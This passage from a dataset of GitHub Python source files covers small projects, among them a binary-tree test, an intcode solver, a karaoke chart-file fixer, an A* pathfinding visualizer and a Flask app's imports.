[31,93,14, 73,94,23]\r\n for x in list:\r\n tree.insert(x)\r\n\r\n def test_1_(self):\r\n print(\"\\nRunning test1: find\")\r\n self.assertTrue(self.tree.find(94))\r\n self.assertFalse(self.tree.find(74))\r\n def test_2_(self):\r\n print(\"\\nRunning test2: insert\")\r\n self.tree.insert(11)\r\n self.assertTrue(self.tree.find(11))\r\n def test_3_(self):\r\n print(\"\\nRunning test3: pre-order traversal (print)\")\r\n capturedOutput = io.StringIO() \r\n sys.stdout = capturedOutput \r\n self.tree.traversePreOrder() \r\n sys.stdout = sys.__stdout__ \r\n result = capturedOutput.getvalue()\r\n self.assertEqual(result,'70 31 14 11 23 93 73 94 ')\r\n def test_4_(self):\r\n print(\"\\nRunning test4: delete\")\r\n self.tree.delete(14)\r\n self.assertFalse(self.tree.find(14))\r\n def test_5_(self):\r\n print(\"\\nRunning test5: not empty\")\r\n self.assertTrue(self.tree.isEmpty())\r\n def test_6_(self):\r\n print(\"\\nRunning test6: empty\")\r\n self.tree.delete(70)\r\n self.assertTrue(self.tree.isEmpty())\r\nif __name__ == 
'__main__':\r\n unittest.main()","repo_name":"Hajime711/Morse_conversion","sub_path":"test_binary_tree.py","file_name":"test_binary_tree.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"979473982","text":"\"\"\"\nFile: counting.py\nPrints the number of iterations for problem sizes \nthat double, using a nested loop.\n\"\"\"\n\nproblemSize = 1000\nprint(\"%12s%15s\" % (\"Problem Size\", \"Iterations\"))\nfor count in range(5):\n number = 0\n\n # The start of the algorithm\n work = 1\n for j in range(problemSize):\n for k in range(problemSize):\n number += 1\n work += 1\n work -= 1\n # The end of the algorithm\n \n print(\"%12d%15d\" % (problemSize, number))\n problemSize *= 2\n","repo_name":"bat67/Fundamentals-of-Python-Data-Structures","sub_path":"Ch_3/counting.py","file_name":"counting.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"75"} +{"seq_id":"22382214124","text":"'''\nHelp script for saving and loading arrays\n'''\n\n\nimport numpy as np\n\n\ndef SaveArray(data, filename):\n # Write the array to disk\n with open(filename, 'w+') as outfile:\n\n outfile.write('# Array shape ( w0, tSteps, dimensions): {0}\\n'.format(data.shape))\n\n # Iterating through a ndimensional array produces slices along\n # the last axis. This is equivalent to data[i,:,:] in this case\n for data_slice in data:\n\n # The formatting string writes the values in left-justified\n # columns 10 characters wide with 4 decimal places.\n np.savetxt(outfile, data_slice, fmt='%-10.4f')\n\n # Writing out a break to indicate different slices...\n outfile.write('# New slice\\n')\n print(\"Data saved to \", filename)\n\n\ndef LoadArray(filename, shape):\n # shape is a tuple of the dimensions of the output array\n # Read the array from disk\n if not isinstance(filename, str):\n filename = str(filename)\n new_data = np.loadtxt(filename)\n\n # Note that this returned a 2D array!\n\n new_data = new_data.reshape(shape)\n return new_data\n","repo_name":"ctvandekamp/adaptive-networks","sub_path":"Python files/ODEs/Bifurcation diagram mean field Chen/saveloadarray.py","file_name":"saveloadarray.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3952160783","text":"#!/usr/bin/env python3\n\nimport itertools\n\ndebug = 1\nif (debug):\n import time\n start = time.perf_counter()\n\nwith open(\"challenge-07-12-2019.txt\",\"r\") as f:\n puzzle_input = [x.strip() for x in f]\n\ndef part1(input):\n program_data = [int(x) for x in input[0].split(',')]\n\n def intcode(data, x, y):\n program_input = [x, y]\n program_output = []\n next_op = 0\n i = 0\n \n while (next_op != 99):\n ap, bp = 0, 0\n next_op = data[i]\n \n if (len(str(next_op)) >= 3):\n ap = int(str(next_op)[-3])\n if (len(str(next_op)) >= 4):\n bp = int(str(next_op)[-4])\n next_op = int(str(next_op)[-1])\n \n a = data[i + 1]\n if (ap == 0 and next_op != 3 and len(data) > a):\n a = data[a]\n if (len(data) > i + 2):\n b = data[i + 2]\n if (bp == 0 and len(data) > b):\n b = data[b]\n if (len(data) > i + 3):\n c = data[i + 3]\n \n if (next_op == 1):\n data[c] = a + b\n i += 4\n elif (next_op == 2):\n data[c] = a * b\n i += 4\n elif (next_op == 3):\n data[a] = program_input.pop(0)\n i += 2\n elif (next_op == 4):\n program_output.append(a)\n i += 2\n elif (next_op == 
5):\n if (a):\n i = b\n else :\n i += 3\n elif (next_op == 6):\n if (a == 0):\n i = b\n else :\n i += 3\n elif (next_op == 7):\n if (a < b):\n data[c] = 1\n else :\n data[c] = 0\n i += 4\n elif (next_op == 8):\n if (a == b):\n data[c] = 1\n else :\n data[c] = 0\n i += 4\n \n return(program_output)\n\n highest = 0\n allinputs = list(itertools.permutations([0, 1, 2, 3, 4], 5))\n for x in allinputs:\n init = 0\n output = 0\n #print(x)\n for y in x:\n if (output != 0):\n init = output[0]\n output = intcode(program_data.copy(), y, init)\n #print(y, init, output)\n if (output[0] > highest or highest == 0):\n highest = output[0]\n \n return(highest)\n\ndef part2(input):\n # Will come back to part 2 later, moving on for now!\n return(1)\n\nprint(\"PartI:\", part1(puzzle_input))\nprint(\"PartII:\",part2(puzzle_input))\n\nif (debug):\n end = time.perf_counter()\n print(\"Runtime: {:5.3f}\".format(end-start))\n \n","repo_name":"jonsmith1982/AdventOfCode2019","sub_path":"challenge-07-12-2019.py","file_name":"challenge-07-12-2019.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37079464900","text":"from python_helper import Constant as c\nfrom python_helper import log\nfrom FrameworkModel import Model\nimport SqlAlchemyProxy, GitCommitter\nimport Api, Session\nimport FrameworkConstant\nfrom LoadSessionAnnotation import LoadSession\nfrom SessionMethodAnnotation import SessionMethod\nfrom PythonFrameworkApplicationScript import *\nimport FrameworkNewSession, FrameworkOpenSession, FrameworkPrintSession, FrameworkLoadApiClassSet, FrameworkCloseSession, FrameworkAddToSession\nimport FrameworkSessionHelper\n\nApi = Api.Api\nSession = Session.Session\nGitCommitter = GitCommitter.GitCommitter\nSqlAlchemyProxy = SqlAlchemyProxy.SqlAlchemyProxy\nFrameworkStatus = FrameworkConstant.Status\n\nclass PythonFramework:\n\n UNEXPECTED_KEYWORD_ARGUMMENT = '__init__() got an unexpected keyword argument'\n MISSING_REQUIRED_ARGUMENT = '__init__() missing 1 required positional argument:'\n\n API_KEY_FRAMEWORK = 'framework'\n API_KEY_GIT_COMMITTER = 'git-committer'\n\n _0_API_KEY = 0\n _1_COMMAND = 1\n _0_ARGUMENT = 2\n _1_ARGUMENT = 3\n _2_ARGUMENT = 4\n _3_ARGUMENT = 5\n _4_ARGUMENT = 6\n\n COMMAND_NEW_SESSION = 'new-session'\n COMMAND_OPEN_SESSION = 'open-session'\n COMMAND_ADD_TO_SESSION = 'add-to-session'\n COMMAND_REMOVE_FROM_SESSION = 'remove-from-session'\n COMMAND_SAVE_SESSION = 'save-session'\n COMMAND_PRINT_SESSION = 'print-session'\n COMMAND_SESSION_COMMAND_LIST = 'session-command-list'\n COMMAND_CLOSE_SESSION = 'close-session'\n\n COMMAND_LIST_ALL_SESSION = 'list-all-session'\n\n COMMAND_RUN_FLASK = 'run-flask'\n\n COMMAND_COMMAND_LIST = 'command-list'\n\n COMMAND_UPDATE_REQUIREMENTS = 'update-requirements'\n\n commandList = {\n COMMAND_NEW_SESSION : [],\n COMMAND_OPEN_SESSION : ['sessionKey'],\n COMMAND_ADD_TO_SESSION : ['sessionKey','apiKey','apiProjectName','apiClassName','gitUrl'],\n COMMAND_REMOVE_FROM_SESSION : [],\n COMMAND_SAVE_SESSION : ['sessionKey'],\n COMMAND_PRINT_SESSION : [],\n COMMAND_SESSION_COMMAND_LIST : [],\n COMMAND_CLOSE_SESSION : [],\n COMMAND_LIST_ALL_SESSION : [],\n\n COMMAND_RUN_FLASK : []\n }\n\n KW_GIT_COMMITTER = API_KEY_GIT_COMMITTER\n\n @SessionMethod\n def handleCommandList(self,commandList):\n globals = self.globals\n log.debug(self.__class__,f'{self.__class__.__name__}.commandList = {commandList}')\n log.debug(self.__class__,f'session = {self.session}')\n commandListReturn 
= self.apiSet[commandList[self._0_API_KEY]][commandList[self._1_COMMAND]](commandList)\n self.repository.close()\n return commandListReturn\n\n @SessionMethod\n def handleSystemArgumentValue(self,commandList,externalFunction):\n globals = self.globals\n try :\n if self.apiClassSet :\n apiClass = self.apiClassSet.get(commandList[self._0_API_KEY])\n if apiClass and apiClass in [self.__class__, GitCommitter] :\n log.success(self.__class__, f'running {commandList} command list')\n return self.handleCommandList(commandList)\n elif apiClass :\n globals.overrideApiTree(apiClass.__name__,package=apiClass.__name__)\n api = apiClass(*self.args,**self.kwargs)\n log.success(self.__class__, f'running {apiClass.__name__}({self.args}, {self.kwargs})')\n return api.handleCommandList(commandList)\n else :\n log.failure(self.__class__,f'''couldn't instance api class of {commandList[self._0_API_KEY]}''', c.NOTHING)\n else :\n log.debug(self.__class__,f'{commandList[self._0_API_KEY]} key called and running all alone')\n externalFunctonReturn = externalFunction(commandList,globals,**self.kwargs)\n self.repository.close()\n return externalFunctonReturn\n except Exception as exception :\n errorMessage = str(exception)\n if self.MISSING_REQUIRED_ARGUMENT in errorMessage :\n newArgs = (*self.args,self.globals)\n try :\n api = apiClass(*newArgs,**self.kwargs)\n log.success(self.__class__, f'running {apiClass.__name__}({self.args}, {self.kwargs})')\n return api.handleCommandList(commandList)\n except Exception as exception :\n secondErrorMessage = f', after first try: {str(exception)}'\n newArgs = *self.args,self.session,self.globals\n try :\n api = apiClass(*newArgs,**self.kwargs)\n log.success(self.__class__, f'running {apiClass.__name__}({self.args}, {self.kwargs})')\n return api.handleCommandList(commandList)\n except Exception as exception :\n thirdErrorMessage = f', after second try: {str(exception)}'\n else :\n secondErrorMessage = ''\n thirdErrorMessage = ''\n globals.error(self.__class__, f'error processing \"{commandList[self._0_API_KEY]}\" call{secondErrorMessage}{thirdErrorMessage}', errorMessage)\n self.repository.close()\n\n def __init__(self,*args,**kwargs):\n self.globals = args[-1]\n externalFunction = args[-2]\n self.args = args[:-2]\n self.kwargs = kwargs\n self.name = self.globals.getApiSetting('api.name')\n self.repository = SqlAlchemyProxy(model=Model,globals=self.globals)\n self.importApplicationScriptPath = f'{self.globals.apiPath}{self.globals.baseApiPath}runtime{c.BACK_SLASH}{IMPORT_SCRITP_FILE_NAME}.{self.globals.PYTHON_EXTENSION}'\n\n self.apiSet = {}\n self.apiSet[self.API_KEY_FRAMEWORK] = {\n self.COMMAND_NEW_SESSION : self.newSession,\n self.COMMAND_ADD_TO_SESSION : self.addToSession,\n self.COMMAND_REMOVE_FROM_SESSION : self.removeFromSession,\n self.COMMAND_SAVE_SESSION : self.saveSession,\n self.COMMAND_OPEN_SESSION : self.openSession,\n self.COMMAND_PRINT_SESSION : self.printSession,\n self.COMMAND_CLOSE_SESSION : self.closeSession,\n\n self.COMMAND_LIST_ALL_SESSION : self.listAllSession,\n\n self.COMMAND_SESSION_COMMAND_LIST : self.sessionCommandList,\n self.COMMAND_COMMAND_LIST : self.printCommandList,\n\n self.COMMAND_RUN_FLASK : self.runFlask,\n\n self.COMMAND_UPDATE_REQUIREMENTS : self.updateRequirements\n }\n self.apiClassSet = self.loadApiClassSet()\n self.gitCommitter = GitCommitter(self.session,self.globals)\n self.apiSet[self.API_KEY_GIT_COMMITTER] = self.gitCommitter.commandSet\n\n @LoadSession\n def loadApiClassSet(self):\n return 
FrameworkLoadApiClassSet.loadApiClassSet(self)\n\n @SessionMethod\n def updateRequirements(self,commandList):\n self.globals.updateDependencyStatus = True\n self.globals.updateDependencies()\n self.globals.updateDependencyStatus = False\n\n @SessionMethod\n def runFlask(self,commandList):\n from PythonFrameworkFlask import app\n flaskReturn = app.run()\n return flaskReturn\n\n @SessionMethod\n def newSession(self,commandList):\n return FrameworkNewSession.newSession(self,commandList)\n\n @SessionMethod\n def addToSession(self,commandList):\n return FrameworkAddToSession.addToSession(self,commandList)\n\n @SessionMethod\n def removeFromSession(self,commandList):\n log.debug(self.__class__,f'{self.__class__.__name__}.removeFromSession({commandList})')\n pass\n\n @SessionMethod\n def saveSession(self,commandList):\n log.debug(self.__class__,f'{self.__class__.__name__}.saveSession({commandList})')\n pass\n\n @SessionMethod\n def listAllSession(self,commandList):\n log.debug(self.__class__,f'{self.__class__.__name__}.listAllSession({commandList})')\n pass\n\n @SessionMethod\n def openSession(self,commandList):\n return FrameworkOpenSession.openSession(self,commandList)\n\n @SessionMethod\n def printSession(self,commandList):\n return FrameworkPrintSession.printSession(self,commandList)\n\n @SessionMethod\n def closeSession(self,commandList):\n return FrameworkCloseSession.closeSession(self,commandList)\n\n @SessionMethod\n def sessionCommandList(self,commandList):\n self.globals.printTree(self.apiSet,f'{c.TAB}Command list: ',depth=2)\n\n @SessionMethod\n def printCommandList(self,commandList):\n self.globals.printTree(self.commandList,f'{self.__class__.__name__} commandList',depth=1)\n\n def printSuccess(self,message):\n self.printMessage(message,c.SUCCESS)\n\n def printError(self,message):\n self.printMessage(message,c.ERROR)\n\n def printWarning(self,message):\n self.printMessage(message,c.WARNING)\n\n def printMessage(self,message,level):\n print(f'{c.TAB}{level}{message}')\n\n\ndef run(*args,**kwargs):\n '''...*args, externalFunction, globals, **kwargs'''\n import sys\n externalFunction = args[-2]\n globals = args[-1]\n commandList = sys.argv.copy()[1:]\n if len(commandList) > 0 :\n framework = PythonFramework(*args,**kwargs)\n sys.argv = []\n return framework.handleSystemArgumentValue(commandList,externalFunction)\n else :\n log.debug(PythonFramework,f'''Command list not found. 
Proceeding by default api launch method''')\n return externalFunction(commandList,globals,**kwargs)\n","repo_name":"SamuelJansen/PythonFramework","sub_path":"api/src/service/PythonFramework.py","file_name":"PythonFramework.py","file_ext":"py","file_size_in_byte":9540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21509050950","text":"# Enter in folder location and regex to be searched.\n# Program will print out the file path and text in file.\nimport glob\nimport re\n\ndef regexSearch (folderLocation, searchRegex):\n txtFiles = glob.glob(folderLocation + '/*.txt')\n for file in txtFiles:\n fileToSearch = open(file).read()\n if searchRegex.search(fileToSearch):\n print(file)\n print(fileToSearch)\n \n \n \nregexSearch('folderlocation', re.compile(r'regex'))","repo_name":"tsmith2077/Reading-and-Writing-Examples","sub_path":"regexSearch.py","file_name":"regexSearch.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2168184909","text":"import numpy as np\n\nfin_a=np.load(\"fin/auc.npz\")[\"auc\"]\nfin_o=np.load(\"fin/oauc.npz\")[\"auc\"]\nmfin_a=np.load(\"mfin/auc.npz\")[\"auc\"]\nmfin_o=np.load(\"mfin/oauc.npz\")[\"auc\"]\nraw_a=np.load(\"raw/auc.npz\")[\"auc\"]\nraw_o=np.load(\"raw/oauc.npz\")[\"auc\"]\n\nae=np.load(\"ae/auc.npz\")\n\nnp.savez_compressed(\"result\",fina=fin_a,fino=fin_o,mfina=mfin_a,mfino=mfin_o,rawa=raw_a,rawo=raw_o,ae_o=ae[\"oauc\"],ae_a=ae[\"auc\"])\n\n\n\n\n\n","repo_name":"psorus/x7","sub_path":"rw/summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7569113114","text":"#!/usr/bin/env python\n\nimport dendropy\nimport os\nimport sys\n\nID = 'index' \nnumber = range(45)\nnumber = number[1:45]\n\nlociFile = 'loci'\n\nlociFile = open(lociFile, 'r')\n\nfor line in lociFile:\n\n\tlocus = line.split('\\t')\n\tlocusOutFile = locus[1] + '_noHistoric.fa'\n\tlocusOutFile = open(locusOutFile, 'w')\n\n\tlocusInFile = locus[1] +'.fa'\n\n\tseqFile = dendropy.DnaCharacterMatrix.get_from_path(locusInFile, \"fasta\")\n\n\tfor num in number:\n\t\tseqFile\n","repo_name":"markphuong/Target_Enrichment","sub_path":"removeHistoric.py","file_name":"removeHistoric.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"36541637135","text":"#wap which accept number from user and convert decimal to hexdecimal and display on console\n\n\ndef hex(no):\n\tbit = 0;\n\tarr = ['A','B','C','D','E','F']\n\tarr_list =list();\n\t\n\twhile( no != 0):\n\t\tbit = int(no%16);\n\t\tif bit <= 9:\n\t\t\tarr_list.append(bit)\n\t\telse:\n\t\t\tarr_list.append(arr[bit-10]);\n\t\tno = int(no/16);\n\t\n\tsize = len(arr_list);\n\tsize = size -1;\n\twhile size >= 0:\n\t\tprint(arr_list[size], end=\" \");\n\t\tsize = size - 1;\n\t\t\n\t\n\ndef main():\n\t\n\tival = int(input(\"Enter number: \"));\n\t\n\thex(ival);\n\tprint();\n\nif __name__ == \"__main__\":\n\tmain();\n","repo_name":"DilipBDabahde/PythonExample","sub_path":"RP/decimal_to_hex.py","file_name":"decimal_to_hex.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"37805495904","text":"from tornado import web\n\n\ndef make_status_web_handler(shared_status, path, 
port, address=''):\n app = web.Application([\n (path, _StatusHandler, dict(shared_status=shared_status))\n ], debug=False)\n\n app.listen(port, address)\n return app\n\n\nclass _StatusHandler(web.RequestHandler):\n TASK_NAME = 'status_handler'\n\n def initialize(self, shared_status):\n self.shared_status = shared_status\n self.status = shared_status.register(_StatusHandler.TASK_NAME)\n self.requests_count = 0\n\n def get(self):\n self._inc_count()\n self.write(self.shared_status.as_dict())\n self._drop_count()\n\n def _inc_count(self):\n self.requests_count += 1\n self._mark_ok()\n\n def _drop_count(self):\n self.requests_count -= 1\n if self.requests_count <= 0:\n self.requests_count = 0\n self.status.mark_ok('idle')\n else:\n self._mark_ok()\n\n def _mark_ok(self):\n self.status.mark_ok(\n 'processing {} request(s)'.format(self.requests_count))\n","repo_name":"karitra/mokak","sub_path":"mokak/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23884070706","text":"#thanks to ryanbevins and SutandoTsukai181 for research\r\nimport sys\r\nimport os\r\n\r\nglobal MODIFIED_COUNT\r\ninput_files = sys.argv[1:]\r\nENDIANNESS = 'little'\r\nMODIFIED_COUNT = 0\r\n\r\n# checks if there are any files\r\nif input_files == []:\r\n input(\"No files detected. You need to drag and drop the file(s).\\nPress any key to continue.\")\r\n quit()\r\n\r\n# gets max possible score\r\ndef get_score(binary_data, n_notes, header_size):\r\n i = 1\r\n score = 0\r\n offset = header_size + 20\r\n regular_count = 0\r\n hold_count = 0\r\n rapid_count = 0\r\n while i <= n_notes:\r\n note_type = int.from_bytes(binary_data[offset:offset + 4], ENDIANNESS)\r\n if note_type == 0: # regular\r\n score += 10 # regular note is 10pt (Great)\r\n regular_count += 1\r\n elif note_type == 1: # hold\r\n score += 30 # hold note is 30pt (Great)\r\n hold_count += 1\r\n elif note_type == 2: # rapid\r\n score += 30 # rapid note is 30pt (Great)\r\n rapid_count += 1\r\n if i > 20: # if heat mode is available (triggers at 20x combo)\r\n score += 5 # +5 points per note during heat mode\r\n\r\n offset += 32\r\n i += 1\r\n print(f'{regular_count} regular notes\\n{hold_count} hold notes\\n{rapid_count} rapid notes')\r\n return score\r\n\r\n\r\ndef save_file(input_file, binary_data):\r\n with open(f'{input_file[:-4]}-new.kbd', 'wb') as f:\r\n f.write(binary_data)\r\n print(f'{os.path.basename(input_file)[:-4]}-new.kbd saved.')\r\n\r\n# loads the file\r\ndef magic_check(binary_data, input_file):\r\n try:\r\n magic = binary_data[0x0:0x4].decode()\r\n except(UnicodeDecodeError):\r\n print(f\"Can't load magic for {os.path.basename(input_file)}, skipping file.\")\r\n return False\r\n if magic == \"NTBK\":\r\n ver = int.from_bytes(binary_data[0x8:0xC], ENDIANNESS)\r\n if ver in [1, 2]:\r\n return True\r\n else:\r\n print(f'Unknown version {ver} found.\\nSkipping {os.path.basename(input_file)}')\r\n return False\r\n else:\r\n print(f'Magic does not match, most likely not a valid karaoke file.\\nSkipping {os.path.basename(input_file)}.')\r\n return False\r\n\r\ndef load_file(input_file):\r\n with open(input_file, 'rb') as binary_file:\r\n binary_data = bytearray(binary_file.read())\r\n num_bytes = binary_file.tell()\r\n if magic_check(binary_data, input_file):\r\n update_values(binary_data, num_bytes, input_file)\r\n\r\n\r\ndef update_values(binary_data, num_bytes, input_file):\r\n global MODIFIED_COUNT\r\n # load values from 
header\r\n print('Loading data from header...')\r\n ver = int.from_bytes(binary_data[0x8:0xC], ENDIANNESS)\r\n size = int.from_bytes(binary_data[0xC:0x10], ENDIANNESS)\r\n n_notes = int.from_bytes(binary_data[0x10:0x14], ENDIANNESS)\r\n max_score = int.from_bytes(binary_data[0x14:0x18], ENDIANNESS)\r\n \r\n\r\n print(f'Version: {ver}')\r\n print(f'Size w/o header: {size}')\r\n print(f'Number of notes: {n_notes}')\r\n print(f'Max score: {max_score}')\r\n\r\n if ver == 1:\r\n header_size = 24\r\n elif ver == 2:\r\n header_size = 28\r\n\r\n # calculates header size\r\n actual_size = num_bytes - header_size\r\n \r\n # calculates number of notes\r\n # 32 bytes is the size of 1 note info\r\n actual_n_notes = int(actual_size / 32)\r\n # calculates max score\r\n actual_max_score = get_score(binary_data, actual_n_notes, header_size)\r\n\r\n # update values\r\n file_modified = False\r\n if size != actual_size:\r\n binary_data[0xC:0x10] = actual_size.to_bytes(4, byteorder=ENDIANNESS)\r\n file_modified = True\r\n print(f'Updated size value. Old: {size} New: {actual_size}')\r\n if n_notes != actual_n_notes:\r\n binary_data[0x10:0x14] = actual_n_notes.to_bytes(\r\n 4, byteorder=ENDIANNESS)\r\n file_modified = True\r\n print(\r\n f'Updated note count. Old: {n_notes} New: {actual_n_notes}')\r\n if max_score != actual_max_score:\r\n binary_data[0x14:0x18] = actual_max_score.to_bytes(\r\n 4, byteorder=ENDIANNESS)\r\n file_modified = True\r\n print(f'Updated max score. Old: {max_score} New: {actual_max_score}')\r\n\r\n # save file\r\n if file_modified:\r\n save_file(input_file, binary_data)\r\n MODIFIED_COUNT += 1\r\n else:\r\n print(f'No values were updated in {os.path.basename(input_file)}.')\r\n\r\n\r\n# loads each file\r\nfor file in input_files:\r\n load_file(file)\r\n\r\ninput(f\"{MODIFIED_COUNT} file(s) were updated.\\nPress enter to continue...\")\r\n","repo_name":"Timo654/de_karaFixer","sub_path":"de_karaFixer.py","file_name":"de_karaFixer.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"40754419234","text":"import pygame\nimport math\nfrom queue import PriorityQueue\n\n#set up grid display\nWIDTH = 800\nWIN = pygame.display.set_mode((WIDTH, WIDTH))\npygame.display.set_caption(\"A* Algorithm\")\n\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nYELLOW = (251, 255, 135)\nLIGHT_BLUE = (189, 225, 255)\nDARK_BLUE = (19, 84, 138)\nWHITE = (255, 255, 255)\nBLACK = (50, 50, 50)\nGREY = (128, 128, 128)\n\n\nclass Node:\n def __init__(self, row, col, width, total_rows):\n self.row = row\n self.col = col\n self.x = row * width\n self.y = col * width\n self.color = WHITE\n self.neighbors = []\n self.width = width\n self.total_rows = total_rows\n\n def get_pos(self):\n return self.row, self.col\n\n #closed: we have already looked at the node\n def is_closed(self):\n return self.color == LIGHT_BLUE\n\n def is_open(self):\n return self.color == DARK_BLUE\n\n def is_barrier(self):\n return self.color == BLACK\n\n def is_start(self):\n return self.color == GREEN\n\n def is_end(self):\n return self.color == RED\n\n def reset(self):\n self.color = WHITE\n\n def make_closed(self):\n self.color = LIGHT_BLUE\n\n def make_open(self):\n self.color = DARK_BLUE\n\n def make_barrier(self):\n self.color = BLACK\n\n def make_start(self):\n self.color = GREEN\n\n def make_end(self):\n self.color = RED\n\n def make_path(self):\n self.color = YELLOW\n\n def draw(self, win):\n pygame.draw.rect(win, self.color, (self.x, self.y, 
self.width, self.width))\n\n def update_neighbors(self, grid):\n self.neighbors = [] # reset each call so repeated searches don't accumulate duplicate neighbors\n if self.row < self.total_rows - 1 and not grid[self.row + 1][self.col].is_barrier(): # down neighbor\n self.neighbors.append(grid[self.row + 1][self.col])\n\n if self.row > 0 and not grid[self.row - 1][self.col].is_barrier(): # up neighbor\n self.neighbors.append(grid[self.row - 1][self.col])\n\n if self.col > 0 and not grid[self.row][self.col - 1].is_barrier(): # left neighbor\n self.neighbors.append(grid[self.row][self.col - 1])\n\n if self.col < self.total_rows - 1 and not grid[self.row][self.col + 1].is_barrier(): # right neighbor\n self.neighbors.append(grid[self.row][self.col + 1])\n\n\n # comparison hook so PriorityQueue can compare two nodes when priorities tie\n def __lt__(self, other):\n return False\n\n# heuristic using Manhattan Distance (\"L distance\")\n# points p1, p2 of form (x, y)\ndef h(p1, p2):\n x1, y1 = p1\n x2, y2 = p2\n return abs(x1 - x2) + abs(y1 - y2)\n\ndef reconstruct_path(came_from, current, draw):\n while current in came_from:\n current = came_from[current]\n current.make_path()\n draw()\n\ndef algorithm(draw, grid, start, end):\n count = 0\n open_set = PriorityQueue() # PriorityQueue helps get the smallest element each time\n open_set.put((0, count, start)) # add start node to open set\n came_from = {}\n # g_score is current shortest distance to get from start to current\n g_score = {node: float(\"inf\") for row in grid for node in row}\n g_score[start] = 0\n # f_score predicted distance of current node to end node \n f_score = {node: float(\"inf\") for row in grid for node in row}\n f_score[start] = h(start.get_pos(), end.get_pos())\n\n open_set_hash = {start} # tells us if node is in the queue or not\n\n while not open_set.empty(): # if empty, we've considered all nodes\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n\n current = open_set.get()[2] # pop the node from the open set\n open_set_hash.remove(current) # also remove it from the hash\n\n if current == end:\n reconstruct_path(came_from, end, draw)\n start.make_start()\n end.make_end()\n return True\n\n for neighbor in current.neighbors:\n temp_g_score = g_score[current] + 1\n\n if temp_g_score < g_score[neighbor]:\n came_from[neighbor] = current\n g_score[neighbor] = temp_g_score\n f_score[neighbor] = temp_g_score + h(neighbor.get_pos(), end.get_pos())\n if neighbor not in open_set_hash:\n count += 1\n open_set.put((f_score[neighbor], count, neighbor))\n open_set_hash.add(neighbor)\n neighbor.make_open()\n\n draw()\n if current != start:\n current.make_closed()\n\n\n# creates a 2D array of nodes\ndef make_grid(rows, grid_width):\n grid = []\n node_width = grid_width // rows #calculate width of a square by dividing width of entire grid by number of rows \n for i in range(rows):\n grid.append([])\n for j in range(rows):\n node = Node(i, j, node_width, rows)\n grid[i].append(node)\n return grid\n\ndef draw_grid_lines(win, rows, grid_width):\n node_width = grid_width // rows\n for i in range(rows):\n # draws horizontal lines at each row\n # pygame.draw.line(surface, color, start_pos, end_pos)\n pygame.draw.line(win, GREY, (0, i * node_width), (grid_width, i * node_width))\n for j in range(rows):\n # draws vertical lines at each column\n pygame.draw.line(win, GREY, (j * node_width, 0), (j * node_width, grid_width))\n\ndef draw(win, grid, rows, grid_width):\n win.fill(WHITE) # fills entire screen with a color every frame\n\n for row in grid:\n for node in row:\n node.draw(win)\n\n draw_grid_lines(win, rows, grid_width)\n\n 
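# Finally, push the freshly drawn frame to the screen: pygame only shows changes after display.update(); main() and algorithm() both call draw() once per loop iteration.\n 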
pygame.display.update()\n\ndef get_clicked_pos(pos, rows, width):\n\tgap = width // rows\n\ty, x = pos\n\trow = y // gap\n\tcol = x // gap\n\treturn row, col\n \n\ndef main(win, width):\n ROWS = 50\n grid = make_grid(ROWS, width)\n\n start = None\n end = None\n run = True\n started = False\n\n while run:\n draw(win, grid, ROWS, width)\n # checks all events in pygame\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n pygame.quit()\n\n # if the mouse button was clicked (left=0, middle=1, right=2)\n if pygame.mouse.get_pressed()[0]:\n pos = pygame.mouse.get_pos()\n row, col = get_clicked_pos(pos, ROWS, width)\n node = grid[row][col]\n if not start and node != end: # color node start color is there is no start\n start = node\n start.make_start()\n elif not end and node != start: # color node end color is there is no end\n end = node\n end.make_end()\n elif node != end and node != start:\n node.make_barrier()\n\n elif pygame.mouse.get_pressed()[2]:\n pos = pygame.mouse.get_pos()\n row, col = get_clicked_pos(pos, ROWS, width)\n node = grid[row][col]\n node.reset()\n if node == start:\n start = None\n elif node == end:\n end = None\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE and start and end:\n for row in grid:\n for node in row:\n node.update_neighbors(grid)\n algorithm(lambda: draw(win, grid, ROWS, width), grid, start, end)\n\n if event.key == pygame.K_c:\n start = None\n end = None\n grid = make_grid(ROWS, width)\n\n pygame.quit()\n\nmain(WIN, WIDTH)","repo_name":"ShayMa3/a_star-path-finding-algorithm","sub_path":"a_star.py","file_name":"a_star.py","file_ext":"py","file_size_in_byte":7685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"27674716563","text":"#----------------------------------------------------------------------------#\r\n# Imports\r\n#----------------------------------------------------------------------------#\r\n\r\nimport os\r\nimport sys\r\nimport json\r\nimport dateutil.parser\r\nimport babel\r\nfrom datetime import datetime\r\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for, jsonify, abort\r\nfrom flask_migrate import Migrate\r\nfrom flask_moment import Moment\r\nfrom flask_sqlalchemy import 